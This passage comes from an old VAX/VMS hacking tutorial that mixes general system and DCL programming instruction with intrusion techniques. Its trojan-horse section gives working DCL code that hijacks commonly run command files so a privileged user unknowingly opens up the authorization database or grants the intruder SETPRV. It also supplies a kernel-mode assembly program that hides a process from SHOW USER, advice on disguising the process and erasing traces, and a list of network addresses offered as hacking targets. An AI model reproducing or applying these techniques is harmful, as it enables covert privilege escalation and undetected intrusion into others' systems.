usually ranges from 1000 blocks to 100000 blocks.  The overdraft is usually 10%

of the quota.  A good setting to keep this at is around 20000 for the quota.



$create/dir/owner=[uic]/prot=(s,o=rwed,g,w) [directory]/log



This will add in your directory and set its protections.



$run authorize



UAF> add [username]/own=[fullname]/acco=[account]/dev=[device]/dir=[directory]-

     /uic=[uic],[privs]/passw=[password]



The items here are:

username  -the name you will use on the system, eg. SMITHJ

fullname  -your actual name, eg John Smith. (of course you don't use your REAL

           name!!)

account   -your account name, usually used for billing purposes

device    -the drive that contains your directory

directory -your login directory. Best to keep an existing one

uic       -your UIC remember format: [group,member]

password  -your account password. You can enter whatever you want here

privs     -your account privileges. Normal is TMPMBX and NETMBX.  If you must

           then specify SETPRV to give you full access to the system



That ties up this section.  For further information about a specific qualifier

just type HELP from the UAF> prompt.



KERMIT

------



Kermit is a file transfer program found on most VAX systems.  It allows the

transfer of files over terminal lines from a remote KERMIT program to the local

KERMIT program.  Invoking Kermit can be done in several ways depending on the

system.  Usually the file is located in the SYS$SYSTEM directory.  The usual

method to start kermit is:



$kermit



NOTE: some machines it may be KERMIT-32 or some other variation.



This may vary on different machines, you may have to RUN the file, or it may

have to be passed parameters such as KERMIT 1200 or KERMIT 2400.  In any case

once you have initiated the program, you should get a kermit prompt:



KERMIT>



Here you can issue several different commands. Following is a list with brief

explanations:





COMMAND     DESCRIPTION

-------------------------------------------------------------------------------

connect   !connects you to a virtual terminal, issue AT commands from here.

exit      !return to DCL

quit      !return to DCL. Same as above

receive   !Single file download from another machine

get       !identical to receive

bye       !terminates a transaction with another kermit in server mode

finish    !same as above but doesn't exit to DCL

send      !Send a file to another machine

server    !causes kermit to enter server mode

set       !set parameters such as parity, delay etc

show      !show the parameters set up currently

status    !current status such as number of bytes transmitted etc

[spawn]   !spawn a subprocess

[local]   !enter VMS commands

-------------------------------------------------------------------------------



The last two commands (in brackets) are not always found on every system, but

briefly they allow you to spawn a subprocess (often useful when you are tied up

in a non-breakable account) and local which can again be used to spawn or issue

other DCL commands.  There are often other commands, varying on what version of

KERMIT is being run.  One important note is that SPAWN cannot be issued from a

CAPTIVE account, but LOCAL (or an equivalent) can.  However, if the system

manager is smart he may set up the UAF record to specify that only one process

can be active with that account at any one time.  If this is the case it will

give you a message telling you that you have exceeded the quota allocated.  The

only way around it is to actually modify the record in SYSUAF.DAT Obviously the

important commands are SEND,RECEIVE and CONNECT.  Once you issue CONNECT, you

can dial out long distance or whatever, just by using regular AT commands.

SEND and RECEIVE are self explanatory so I wont go into them.





DECSERVERS

----------



This deserves a little bit of attention also.  Basically DECservers allow the

the user to easily switch between various nodes in a cluster.  Unless you are

logging in directly to a terminal, you will usually not encounter this.  If you

do, heres what you will see:



Enter Username>



Or something of the like.  At this point you should just type A or C or

whatever else.  It is just a terminal identifier and means absolutely nothing.

At this point you will get a prompt such as:



LOCAL>



Here you can do a limited number of commands.  The important ones are:



LOCAL> show users



This will show the users on the DECserver, and what machines they are connected

to etc.  To view all the machines on the server, type:



LOCAL> show nodes



This will present a list of the callable nodes.  To connect to any one of these

you would issue a command such as:



LOCAL> connect SBSU



This is assuming the nodename was SBSU.  That's basically all there is to the

DECservers.  The other commands are really not that useful to the beginning VAX

hacker but can nonetheless be referenced by typing HELP at the LOCAL prompt.





SYSTEM DUMP ANALYZER

--------------------



  Although the SDA is not really for beginners, it is such an important topic

that I thought I would give a really brief overview of what it is all about.

Basically to call up SDA, type:



$analyze/system



This will return you with the prompt:



SDA>



At this point you can do many great things.  Oh, before I continue, it should

be noted that you need CMKRNL privilege in order to run this program.  In any

case, once you get the SDA prompt, there are several interesting things you can

do.  Basically, SDA is a watching tool.  It lets you keep track of what other

processes on the system are doing.  To get information on another process just

type:



SDA> show process [username]



you should put in a person who is logged in where I have put the [username]

variable.  This will give you a page of useful information on that specific

process.  The interesting thing is that with the SDA, you can access any part

of memory, unlike EXAMINE from DCL.  You can for example get the PCB address

for a process and then go in and either view or modify things such as privs,

priority etc.  You can also view other processes type-ahead buffers, and see

what they are doing.  Like I stated earlier, this is a relatively advanced

topic and doesn't fit well into a beginners file, so I will leave it at this,

but here I will provide a diagram of the PCB block so that you can see which

bytes do what:





                        - SOFTWARE PCB DETAILED LAYOUT -



                    BLOCK 1                           BLOCK 2



              +---------------+                +---------------+

:pcb$l_sqfl   !               !                !               !:pcb$t_terminal

              +---------------+                !               !

:pcb$l_sqbl   !               !                +---------------+

              +---+---+-------+                !               ! :pcb$l_pqb

:pcb$b_type   !   !   !       ! :pcb$w_size    +---------------+

 pcb$b_pri    +---+---+---+---+                !               ! :pcb$l_efcs

:pcb$w_mtxcnt !       !   !   ! :pcb$b_astact  +---------------+

              +-------+---+---+  pcb$b_asten   !               ! :pcb$l_efc2p

:pcb$l_astqfl !               !                +---------------+

              +---------------+                !               ! :pcb$l_efc3p

:pcb$l_astqbl !               !                +---------------+

              +---------------+                !               ! :pcb$l_pid

:pcb$l_phypcb !               !                +---------------+

              +---------------+                !               ! :pcb$l_phd

:pcb$l_owner  !               !                +---------------+

              +---------------+                !               ! :pcb$t_lname

:pcb$l_wsswp  !               !                !               !

              +---------------+                !               !

:pcb$l_sts    !               !                +---------------+

              +---------------+                !               ! :pcb$l_jib

:pcb$lwtime   !               !                +---------------+

              +---+---+-------+                !               ! :pcb$q_priv

:pcb$b_wefc   !   !   !       ! :pcb$w_state   !               !

 pcb$b_prib   +---+---+-------+                +---------------+

:pcb$w_tmbu   !       !       ! :pcb$w_aptcnt  !               ! :pcb$l_arb

              +-------+-------+                +---------------+

:pcb$w_ppgcnt !       !       ! :pcb$w_gpgcnt  !               ! :pcb$l_uic

              +-------+-------+                +---------------+

:pcb$w_biocnt !       !       ! :pcb$w_astcnt  !               ! :pcb$l_lockqfl

              +-------+-------+                +---------------+

:pcb$w_diocnt !       !       ! :pcb$w_biolm   !               ! :pcb$l_lockqbl

              +-------+-------+                +---------------+

:pcb$w_prccnt !       !       ! :pcb$w_diolm   !               ! :pcb$l_dlckpri

              +-------+-------+                +---------------+



NOTE: BLOCK 2 is just a continuation of BLOCK 1.  The PCB is the Process

      Control Block which is assigned to each process. It holds all the

      relevant information for the particular process.  The address for

      the PCB is shown when you execute the SHOW PROCESS  from SDA



Note that when you are examining memory you can specify addresses in two ways:



      1) locationA:locationB   -from locationA to locationB

      2) locationA;numbytes    -from locationA to locationA+numbytes



FURTHER HELP

------------



Like I have stressed throughout this file, the best way to learn about VMS is

to use the ONLINE HELP that is available on virtually every VAX.  You may have

also noticed that certain programs such as MAIL have self-contained help which

is not seemingly accessible from the normal HELP.  So how do you get that

information?!  Well, all the extra help files for programs such as MAIL, SDA,

AUTHORIZE, etc are all stored in the SYS$HELP directory.  The only problem is

that they are not in very human readable form.  To get a properly formatted

text output you can use the LIBRARY command.  Here is an example that dumps all

the help file on SDA into a file called SDA.HLP in your directory:



$library/extract=(*)/output=sys$login:sda sys$help:sda.hlb



Now to explain this line.  The library program will extract the SDA help file

(sys$help:sda.hlb) and put it into your login directory (sys$login:sda.hlp).

Where I have put the (*), you can alternatively put any number of commands that

you may want referenced.  The (*) will dump ALL the commands into the help file

For example to ONLY get the SHOW command and its qualifiers (for SDA) into a

file, you may try something like:



$library/extract=(show)/output=sys$login:sda_show  sys$help:sda.hlb



Since the files generated from this command is standard ASCII, you can read

these help files with the TYPE command, ie.



$type sys$login:sda.hlp



The same method can be utilized for any of the other commands to which you

normally do not have access, eg. AUTHORIZE, SDA etc.  This way you can learn

and understand the command without necessarily having the privilege of reading

it in the first place.  Of course I recommend that you read both the AUTHORIZE

and SDA files since they are probably the most useful files in the bunch.  To

get a list of the other help files, just do:



$dir sys$help:*.hlb



Then you can specify any of the listed files in the LIBRARY command. If you

create these files, just make sure you delete them, once you are through with

using them, especially if they are in someone elses ACTIVE account.







TROJAN HORSES

-------------



Lets suppose you have done all you can in trying to gain privileges, and you

have neither come up with a high level account, or any mechanism of boosting

your privs. Now what? Well the following methods I will describe should be able

to net you more privileges but there is one small problem.  These methods

usually involve modifying or creating new files in certain places.  If the

system manager were to notice such a file, he could simply perform a DIR/OWNER

and would know which account someone was hacking on, and he would no doubt

change the password or kill the account.  Now this is an IF situation. Although

theres a good chance you will get away with it, you still have that risk factor

that says that you may very well lose this particular VAX.  So if this is the

only VAX that you have access to, and you are still in the learning process,

don't try these techniques.  Once you have learned the operating system well

enough and feel that you can afford to lose the VAX if worst comes to worse

then you can proceed with these time honoured techniques:



Ok so what is a trojan horse?  Based on the original definitions for such

programs, a trojan is simply a file that you have someone execute which

performs some arbitrary task unbeknownst to the user.  Of course there are the

typical trojan programs that go through the logon sequence and try and procure

user/password combinations. This is fine, but what about other methods?  Its

fine for getting more accounts, some which may be possibly privileged, but you

still aren't guaranteed to get a good account.  So what do you do?!  Well, as

everyone should know by now, the easiest way to get more privileges is to give

them to your user via the AUTHORIZE program.  The problem is that on all VAXes,

the SYSUAF.DAT file is read/write protected and on some even the AUTHORIZE file

itself is protected.  The key is to unlock these files, so that they can be

accessed through the WORLD protection field.  The easiest way to do this is to

have a privileged user unwittingly do the dirty deed for you.  Here I will

describe a few methods of accomplishing such a task.



 The key here is to find a COM file that the users often use.  This could be

anything from some simple utility to a full featured DCL program such as

ADDUSER.COM.  What I usually do is search through the system symbols (SHOW

SYMBOL *) and logical table (SHOW LOGICAL) for definitions that are executed

via COM files.  Often you will find in the symbol table some weird utility

like NOTES that everybody executes. Lets assume you have found a prospective

program.  The next thing to check is to see if you write access to the

direcotry in which this file resides.  If you have READ access also, then you

can simply put in your TROJAN coding right within the main program (after

saving the original copy somewhere safe).  If you don't have read access, then

you can create a program with the same filename.  Since your program will have

a higher version number, it will get executed instead of the original program.

Then you perform your deed and delete the TROJAN and continue on and execute

the real COM file.  Here is an example, which is a fragment of a DCL routine

but can easily be changed to fit inside another routine.





$ pre_prvs=f$setprv("setprv")

$ if f$privilege("setprv") then goto fix

$ @notes.com;55

$ fix:

$ set prot sys$system:sysuaf.dat/prot=(w:rwed)

$ set prot sys$system:authorize.exe/prot=(w:rwed)

$ pre_prvs=f$setprv(pre_prvs)

$ @notes.com;55





In this example we have created another file called notes.com;56 in the proper

directory.  Whenever someone types in NOTES this file gets executed instead of

the original.  When control is passed here, it checks if the user has SETPRV

privilege.  If he doesn't, it continues on with the normal program

(NOTES.COM;55) If the user has the SETPRV privilege, you have the program

change the protection on SYSUAF.DAT and AUTHORIZE.EXE to full World Access.

This means that you can now run AUTHORIZE from ANY ACCOUNT no matter how lowly

it is!!!  Is that awesome or what?!   Once the protection has been changed, you

can erase the notes.com;56 file and no one will ever know anything happened!

Similarly if you modified the actual DCL program, then you just copy back the

original.  Remember its extremely important to tidy up after yourself once you

are done!



 Here is another example, which you may want to try. First of course you MUST

check for the privileges of the user (just like in the above program), then

try:



$open/write file sys$scratch:adduaf.tmp

$write file "$ RUN SYS$SYSTEM:AUTHORIZE"

$write file "MODIFY NAME/PRIV=SETPRV"

$close file

$@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat

$del sys$scratch:adduaf.*;*





This little patch in the coding will modify your own users privileges and give

them SETPRV when the superuser executes this routine.  The trick is to hide it

within some other program so he doesn't even realize he has done anything! Of

course after the routine has been successfully executed, the original coding

should be put back.  There are many places you can put this routine, including

ADDUSER.COM (if you have write access)!  That would mean, every time the

system manager went to add a new user, he would also boost your privs! HaHa,

quite ironic eh?!  The farthest thing that he wants to do, and you make him do

it without even realizing.  Of course you should use your imagination and put

this or a similar routine in a place where it will be quickly executed.  The

longer the code stays around without being execute, the more chance that it

will be discovered.  An optimum program would be something that the

users/operators execute frequently (eg notes, mail, phone etc)  Other good

places are the LOGIN.COM and SYLOGIN.COM files.  Just remember to cover your

tracks once you're done!!



 This is but a brief introduction to Trojans and the like.  You should use your

own imagination to come up with other ways of making the system operators

succumb to your wishes...heh heh.





DCL PROGRAMMING

---------------



 No file would be complete without at least mentioning programming Command

Procedures.  Basically, these are like BAT files from MS-DOS or script files

from UNIX.  They form a rudimentary but powerful language that allows you to

quickly create small programs to handle most simple tasks.  This section is not

intended to be a a full blown tutorial on programming in DCL, rather its an

introduction to what it is all about.

 It is quite easy to pick up programming in DCL and the best way to learn is to

have a look at some of the COM files you will find on the various VAXes that

you hack on.  By studying these, you can quickly learn the methods on how to

perform

certain routines.  Below I have listed some of the commonly needed routines

when programming in DCL:





PASSING PARAMETERS



Parameters can be passed to DCL programs directly from the shell in several

ways. Here are a few examples:



(1) @sample 24 25



    When you execute this, the values 24 and 25 are passed to the sample.com

    file in the variables p1 and p2 respectively. ie p1=24, p2=25



(2) @sample Paul Cramer



    p1=PAUL,  p2=CRAMER



(3) @sample "Paul Cramer"



    p1=Paul,  p2=Cramer



(4) name= "Paul Cramer"

    @sample 'name'



    This example demonstrates the method of passing predefined variables to a

    command procedure.  In this case,  p1=PAUL,  p2=CRAMER



(5) name ="""Paul Cramer"""

    @sample 'name'



    Note that passing the variable in three double-quotes preserves the case.

    p1=Paul,  p2=Cramer







GETTING INPUT



  Often it is necessary to get some sort of input from the user when executing

a command procedure.  This is performed through the INQUIRE command. Some

examples follow:



(1) INQUIRE variable "prompt"



    This will display the 'prompt' message and then wait for input.  The string

    passed is kept in 'variable'



(2) INQUIRE/NOPUNC variable "prompt"



    When you specify /NOPUNC, the prompt will NOT be followed by a colon and

    space as is the default.



(3) INQUIRE/LOCAL variable "prompt"

    INQUIRE/GLOBAL variable "prompt"



    It should be noted that if you specify /LOCAL, the variable will remain in

    the local symbol table accessible only by this particular COM file.  If on

    the other hand, you specify /GLOBAL, the variable is placed in the global

    symbol table and is made accessible to other files.



(4) IF pn .eqs. "" THEN INQUIRE pn "prompt"



    You can use this method to check if a certain variable (pn in this case) is

    null or not.  If it is, you can ask for input.



(5) READ/PROMPT="prompt" SYS$COMMAND variable



    This is another method of getting input.







SUPPLY INPUT FOR A PROGRAM



Often you may need to create a file and get input from some outside source.

Again there are several ways of doing this.  Here I will outline three

different methods:



FROM DATA      :- CREATE TEST.DAT

                  data line 1

                  data line 2

                       :

                       :

                    etc etc



FROM TERMINAL  :- DEFINE/USER_MODE SYS$INPUT SYS$COMMAND

                  CREATE TEST.DAT



FROM A FILE    :- DEFINE/USER_MODE SYS$INPUT TEST.INPUT

                  CREATE TEST.FILE





OUTPUTTING INFORMATION



In general when outputting information, you should always send it to SYS$OUTPUT

What this does is automatically write to whatever the user has defined as

SYS$OUTPUT.  It doesn't matter what type of terminal or whatever it is, but it

will send it in the correct format.  Some examples follow:



(1)  WRITE SYS$OUTPUT "literal text"



     This will print 'literal text' on your terminal.



(2)  WRITE SYS$OUTPUT symbol-name



     This will print on your terminal whatever value is held in symbol-name



(3)  WRITE SYS$OUTPUT "literal text ''symbol-name'  literal text"



     This example shows how you can mix in normal text with a variable and

     follow it by more text.



(4)  TYPE SYS$INPUT

     this is a sample message

     that is spread out over

     several lines.



     You would use this method whenever there are more than a few lines of text

     to be printed.







WRITING TO A FILE



You will find that many times when writing a COMmand procedure you will need to

save certain information to a file.  This can be accomplished with a routine

similar to:



OPEN/WRITE FILE TEST.DAT

WRITE:

 INQUIRE DATA "Input Data"

 IF DATA .EQS. "" THEN GOTO DONE

 WRITE FILE DATA

 GOTO WRITE

DONE:

 CLOSE FILE



I will give a quick breakdown of what is going on here.  First you open the

file that you want, including the /WRITE qualifier followed by the filename.

This sample program simply inputs data, writes each line to a file and exits

when the user hits RETURN on a blank line.  Simple but effective text input

facility.







READING A FILE



Once you have written a file, you will often need to read that information back

in again. For example you may keep track of when the person last ran the file.

Each time the file is run, you would save the time/date to a file, and then

read it back in, and display it on each subsequent execution.  The sample

structure of a read routine would be:



OPEN/READ FILE TEST.DAT

READ:

 READ/END_OF_FILE=DONE FILE DATA

      .

      .

      .

 GOTO READ

DONE:

 CLOSE FILE



This routine would loop and keep reading a file, one line at a time, storing

the information in DATA until the end of file is detected.







CONDITIONAL LOGIC



No programming language would be complete without the ability to perform logic.

Although it is very simplistic, it provides just enough power to handle most

simple conditions.  Some examples:



(1) IF p1 .EQS. "" THEN GOTO DEFAULT



    In this example the procedure checks to see if the parameter passed in p1

    is NULL or not.  If it is then the program branches to DEFAULT



(2) IF p1 .NES. 10 THEN GOTO end_label

           .

           .

           .

    END_LABEL:



    Here we see that if p1 does not equal 10 then the program branches to

    END_LABEL, otherwise it continues.



(3) COUNT = 0

    LOOP:

     COUNT=COUNT+1

        .

        .

        .

     IF COUNT .LE. 10 THEN GOTO LOOP

    EXIT





    This example shows how to establish a loop in a command procedure, using

    the symbol COUNT and an IF statement.  The IF statement checks the value

    of COUNT and performs an EXIT when the value is greater than 10





EXPRESSIONS



   The data operations and comparisons are listed below in order of precedence

beginning with the highest (operations and comparisons grouped together in the

table have the same precedence).





   +--------+---------------------------------------------------------+

   Operator                    Description

   +--------+---------------------------------------------------------+

      +     Indicates a positive number

      -     Indicates a negative number

   +--------+---------------------------------------------------------+

      *     Multiplies two numbers

      /     Divides two numbers

   +--------+---------------------------------------------------------+

      +     (1) Adds two numbers

            (2) Concatenates two character strings

      -     (1) Subtracts two numbers

            (2) Subtracts two character strings

   +--------+---------------------------------------------------------+

    .EQS.   Tests if two character strings are equal

    .GES.   Tests if first character string is greater than or equal

    .GTS.   Tests if first character string is greater than

    .LES.   Tests if first character string is less than or equal

    .LTS.   Tests if first character string is less than

    .NES.   Tests if two character strings are not equal

    .EQ.    Tests if two numbers are equal

    .GE.    Tests if first number is greater than or equal to

    .GT.    Tests if first number is greater than

    .LE.    Tests if first number is less than or equal to

    .LT.    Tests if first number is less than

    .NE.    Tests if two numbers are not equal

   +--------+---------------------------------------------------------+

    .NOT.   Logically negates a number

   +--------+---------------------------------------------------------+

    .AND.   Combines two numbers with a logical AND

   +--------+---------------------------------------------------------+

    .OR.    Combines two numbers with a logical OR

   +--------+---------------------------------------------------------+









LEXICAL FUNCTIONS

-----------------



That concludes the introduction to DCL programming.  One thing that you should

keep in mind is that many powerful string editing and environment information

commands can be accessed from COM files.  These are called the LEXICAL

functions There are too numerous to list them all here, so I will just provide

a summary of the primary lexical functions and a brief description:







LEXICAL       DESCRIPTION

-------------+------------------------------------------------------------------

f$cvsi       !converts character string data (signed value) to an integer

f$cvtime     !retrieves information about an absolute, combination, or delta

              time

f$cvui       !converts character string data (unsigned value) to an integer

f$directory  !returns the current default directory name string

f$edit       !edits a character string based on the edits specified

f$element    !extracts an element from a string in which the elements are

             !separated by a specified delimiter

f$environment!obtains information about the DCL command environment

f$extract    !extracts a substring from a character string expression

f$fao        !converts the control string to an ASCII string

f$file_attrib!returns attribute information for a specified file

f$getdvi     !returns parameters for a specified device

f$getjpi     !returns accounting, status and identification info for a process

f$getsyi     !returns status and identification information about local or

             !remote nodes.

f$identifer  !converts an identifier in named format to its integer equivalent

f$integer    !returns the integer equivalent of the result of an expression

f$locate     !locates a character substring within a string and returns its

             !offset within the string

f$logical    !translates a logical name and returns the equivalence name string

f$message    !returns the message text associated with a system status code

f$mode       !shows the mode in which the process is executing

f$parse      !parses a file spec and returns either the expanded file spec or

             !a particular field that you specify

f$pid        !for each invocation, returns the next PID in sequence

f$privilege  !returns a value of TRUE or FALSE depending on whether your

             !process privileges match the privileges listed in the argument

f$process    !returns the current process name string

f$search     !searches the directory and returns the full file spec for any

              file

f$setprv     !sets the specified privileges and returns the previous state

f$string     !returns the string equivalent of the result of the specified

             !expression

f$time       !returns the data and time of day in format:  dd-mm-yy hh:mm:ss.cc

f$trnlnm     !translates a logical name and returns the equivalent name string

f$type       !determines the data type of a symbol

f$user       !returns the current user identification code (UIC)

f$verify     !set or read current command procedure state

-------------+-----------------------------------------------------------------



This list just outlines the main lexical functions.  Within each function there

may be many more subfunctions.  If you need help on any of these functions or

their subfunctions, just type HELP lexical [lexicalname] at any DCL prompt ($)







ERROR MESSAGES

--------------



 Occasionally when you are using DCL, you will come across error messages that

are sent to you by the VAX.  Here I will give a break down of what the

different fields in the message represent and how to interpret them. First of

all, the general format of an error message is:



%facility-l-ident, text



NOTE: not all messages are ERROR messages.  Often it is only an informational

      message telling you that a certain task was successful or whatever. In

      any case here is what each field means:



facility  -this is the name of the facility that produced the  error (for

           example, CLI for the Command Language Interpreter).



l         -this is a one letter code indicating the severity of the error.

           The severities are:



                  I - Informational      E - Error

                  S - Success            F - Severe error

                  W - Warning



ident     -this is an abbreviation for the message text.



text      -this is a short description of the nature of the error.





Here is an example of an error message, and how to interpret it:



%SYSTEM-F-NOCMKRNL, operation requires CMKRNL privilege



The percent sign in the beginning tells you it is a system message from the VAX

the first field (SYSTEM) indicates that it is a SYSTEM error.  The second field

(F) shows that it is a severe error.  The third field (NOCMKRNL) is a short

abbreviation showing that you do not have the CMKRNL privilege, and the actual

text is followed giving the error in detail, explaining that you MUST have the

CMKRNL privilege to perform that particular command.



SAMPLE PROGRAMS

---------------



Here I present two sample programs. One is the STEALTH assembly language

program that allows you to hide from SHOW USER.  The other program is a DCL

COM file that allows you to keep track of who is logging on and off.





WATCHDOG.COM

------------



  Instead of typing the program into the VAX manually, you can just cut this

program out in your favorite text editor and save it to a file. Then at the DCL

($) prompt type:



$create watchdog.com



Then transmit this file over your buffer.  After the file is transmitted, hit

CTRL-Z.  This will bring you back to the DCL prompt.  At this point you can now

use this file. To enable watchdog, type:



$@watchdog



Basically I wanted to present a COM file to give you an idea of how one works.

I have tried to throw in a lot of the different techniques that you can use

from COM files into this one example.  In addition to providing you with a

good example of how COM files can be manipulated, this program also serves as

a valuable utility that you can use to monitor the system that you are on.

 The idea behind watchdog is to keep track of all the people who are logging in

or out of the system. This can be a very handy tool to keep a watch out for

system operators etc. The nice thing about this program is that it runs in the

background, so that you can continue to do whatever you want.  You should note

how I go about creating another file (watch.com) from within the main watchdog

program. This of course wasn't necessary since I could have put the whole thing

into one file and you could just as easily type: spawn/nowait @watchdog, but

like I stated earlier, the intention is to give a short tutorial on some of the

techniques that you can employ.  I have also used several lexicals within the

program to give you an idea of how you can use them within your own creations.



NOTE: you can terminate WATCHDOG at any time by hitting CTRL-Y, and restart it

      using: @watchdog







---------------------------------- cut here -----------------------------------



$ !WATCHDOG.COM  by ENTITY /CCC!

$ !Usage: @watchdog

$ !

$ !This handy little utility runs in the background, freeing you to perform

$ !other tasks, while at the same time keeping track of who is logging ON or

   OFF

$ !the system. It is a simple demonstration of how powerful DCL programming can

$ !be when it is used together with the lexical functions.

$ !

$ !CTRL-Y will terminate the WATCHDOG subprocess at any time.  The program

$ !also automatically terminates when you log off.

$ !

$ create watch.com

$ deck

$ on control_y then goto terminate

$ del watch.com;*

$ w := write sys$output

$ node    = f$getsyi("nodename")

$ cpu     = f$extract(1,3,f$getsyi("node_hwtype"))

$ version = f$getsyi("version")

$ boot    = f$extract(0,17,f$getsyi("boottime"))

$ w "WATCHDOG  on  ''node'  VAX-11/''cpu'  VMS ''version'"

$ w "Up since ''boot'      (c) 1989 Entity"

$ list = "watch1.dat"

$ gosub file_io

$ c1 = c

$ loop:

$ list = "watch2.dat"

$ gosub file_io

$ c2 = c

$ if c1 .eq. c2 then goto loop

$ if c2 .gt. c1 then goto newuser

$ file  = "watch1.dat"

$ file2 = "watch2.dat"

$ gosub compare

$ w "--- ''a' ---  ''timelog' "

$ goto loop

$ newuser:

$ file  = "watch2.dat"

$ file2 = "watch1.dat"

$ gosub compare

$ w "+++ ''a' +++  ''timelog' "

$ goto loop

$ !

$ ! Construct a UserList of processes currently logged in

$ !

$ file_io:

$ c = 0

$ sho users/output = watch.dat

$ open/share/read in watch.dat

$ open/share/write out 'list'

$ read in a

$ read in a

$ read in a

$ lp01:

$ read/end_of_file=fin1 in a

$ write out a

$ c = c + 1

$ goto lp01

$ fin1:

$ close in/nolog

$ close out/nolog

$ purge watch.dat

$ purge 'list'

$ return

$ !

$ ! Get a formatted output of the current TIME and DATE of LOGIN/LOGOUT

$ !

$ gettime:

$ temp = f$extract(3,3,f$time ())+" "+f$extract(0,2,f$time())+","

$ temp = temp + f$extract(7,4,f$time())+"  "+f$extract(12,5,f$time())

$ timelog = f$cvtime("today",,"weekday")+" "+temp

$ return

$ !

$ ! Compare the Userlist to a previous listing

$ !

$ compare:

$ open/share/read in 'file'

$ lp02:

$ read/end_of_file=fin2 in a

$ a=f$fao("!12AS",a)

$ set message/noid/nofac/notext/nosev

$ search 'file2' 'a'

$ chk = $severity

$ set message/id/sev/fac/text

$ if chk .eqs. "1" then goto lp02

$ fin2:

$ close in/nolog

$ gosub gettime

$ c1 = c2

$ copy watch2.dat watch1.dat

$ purge watch1.dat

$ return

$ !

$ ! Terminate process and cleanup.

$ !

$ terminate:

$ w "USER TERMINATION OF WATCHDOG!"

$ set message/nofac/noid/notext/nosev

$ del watch*.dat;*

$ set message/fac/id/text/sev

$ pid = f$getjpi("","PID")

$ stop/id='pid'

$ eod

$ spawn/nowait @watch.com

$ exit



---------------------------------- cut here -----------------------------------





NOTE: Notice the little trick that I employ on the 16th line of the DCL file:

      I have the program delete itself!  This can be VERY useful in many

      applications where you don't want the program lying around after it has

      been executed once (eg. trojan horses!)









STEALTH.MAR

-----------



 Ok here i present the stealth.mar program.  This little assembler beauty lets

you hide from the SHOW USER command!  Very useful for remaining undetected on

VAX/VMS systems.  Ok first heres the program:







---------------------------------- cut here -----------------------------------



.library /sys$library:lib.mlb/

.link /sys$system:sys.stb/

$pcbdef

.entry no_user,^m<>

$cmkrnl_s routin=blast_it

ret

.entry blast_it,^m<>

tstl pcb$l_owner(r4)

bneq outta_here

bbcc #pcb$v_inter,pcb$l_sts(r4),outta_here

clrb pcb$t_terminal(r4)

decw g^sys$gw_ijobcnt

bisl #pcb$m_noacnt,pcb$l_sts(r4)

outta_here:

movl #ss$_normal,r0

ret

.end no_user



---------------------------------- cut here -----------------------------------





Ok heres the instructions on using it.  First create the file stealth.mar on

the VAX. This can be accomplished by:



$create stealth.mar



Then transmit this file through the buffer option in your terminal program.

After you finish the transmit, hit CTRL-Z to exit the create file option. At

this point you will be put back into DCL.  Then perform the following steps:



$macro stealth

$link /nomap stealth

$delete stealth.obj;*

$delete stealth.mar;*

$run stealth

$del stealth.exe;*

$show system



At this point, your screen will fill up, showing you all the active processes.

Make a note of the processes that have the format: "symbiont_xxxx" Look for the

last available one, then increase the number by 1.  For example if the last

symbiont process was "symbiont_0003" then you should type:



$set proc/name="symbiont_0004"



This will effectively name your process as a printer driver, thereby making it

even harder to detect you.  Of course you are not safe from the SDA (since it

can access memory directly) but it affords quite a bit of protection

nonetheless Ok one small note, you require CMKRNL privilege to execute this

file (because of the Change To Kernal Mode command in the 5th line of the

code).  One other point that I want to make is that you should NEVER leave the

.MAR or .OBJ file for STEALTH on ANY system!  The best thing is to either hide

the EXE file in some remote directory or delete it, after you execute it.  It

doesn't hurt to play it safe!





NOTE: a programming note, if you need to access the symbols defined by the

    system, such as the number of users online etc, you should link the system

      symbol table to your OBJ file. The actual file is: sys$system:sys.stb









DATAPAC VAX LISTING

-------------------



    Here I provided a partial list of CANADIAN VAXes hooked up on DATAPAC.

These have been provided merely as a hacking exercise to get you started, and

as such i have not listed any user/password combinations.  Some of these have

regular defaults, other have variations, and yet others require some thinking

and good luck to get in!  One small point, since all of these are Canadian

I have not bothered to include the DNIC.  So if you are calling through lets

say telenet and for example if the nua in the listing is 38701020 then to

connect to it, use the NUA 0302038701020  (ie add a 03020 to the beginning).

All of these VAXes were up and operating at the time of writing...



CANADIAN VAX LISTING

--------------------



 21700051          66200071            43700018            93800046

 76600029          62400061            87400010            91100024

 62700151          30400017            33400620            95100160

 41500778          88500561            93600010            66700024

 70700033          88500100            36700026            87400010

 85800778          76150042            36700027            90400156

 60500417          56290039            36700581            95100160

 64100146          55400127            36700178            91100024

 35600330          83500600            39100556            62700056

 44200519          49900053            36700211            59600384

 44600032          78100120            20500047            60100175

 88100073          64700253            85701445            63100131

 20500366          69200295            28330324            85701445

 44400900          97500075            28361325            63300483

 72101099          83400117            28362116            59500120

 64700029          95100160            36700140            78100265

 71100755          91100024            43700018            21450017

 53700306          49700003            54100112            93800393

 38700165          63300483            48500127            70700033

 24400263          78100651            57100010            43700230

 22500019          78100265            45800116            30500037

 68100563          78100092            54100013            37200020





CONCLUSION

----------

Ah, that be it!  I hope you enjoyed the file and found it informative.  As i

stated earlier, it was not intended to be an advanced course on VAX hacking,

merely an introduction to whet your appetite and lead you on to bigger and

better things.  Since this file was put together in quite a hurry, i realize

that it isn't properly organized, and i am sure i forgot to mention some

important things, so i must apologize for that.  I also didn't get a chance to

verify all of the diagrams and charts I have put in (a lot of it was from

memory) but to the best of my knowledge all of this information is correct.

One minor point is that some commands may perform a bit differently on

different versions of VMS.  For example the SHOW USER output that I have

described is quite different in version 4.4 from version 5.1 The main ideas

that I have described however, apply to all versions of VMS, and you shouldn't

have any difficulties.



If you have any comments, suggestions, criticisms or even questions, i would be

glad to hear from you.  You can reach me in several ways.  First i can be found

on these boards:



CCC HQ :  (416)/398-3301    User:GUEST,  PW:GUEST

NODE 13:  (416)/756-4545    type  !!  ,login:LYNX



You can also reach me on QSD (France): 33-36-43-15-15, leave mail to ENTITY.

If you are calling through a Packet Switching System, then you can reach call

the QSD NUA at: 0208057040540.  You can also probably find me hanging around

on these CHAT systems:



TCHH  :026245400050570   login: guest

ALTGER:026245890040004   login: guest





 Now before I take off, I would like to thank some people who have made hacking

VAX/VMS possible and a helluva lot more fun for me!



Disk Weasel   - for getting me started into VAX/VMS hacking in the first place!

                (thanks Catherine for introducing us!)

Jetscream     - for all the late night hacking sessions clobbering systems!

Wonder Warthog- for so freely sharing 5 billion VAX accounts with me.  The man

                with infinite defaults..how does he do it!?...haha

The Keeper & Flex Motta- for sharing many a system with me

Rod & Scott  (SRB tech)- thanks for all the technical help!

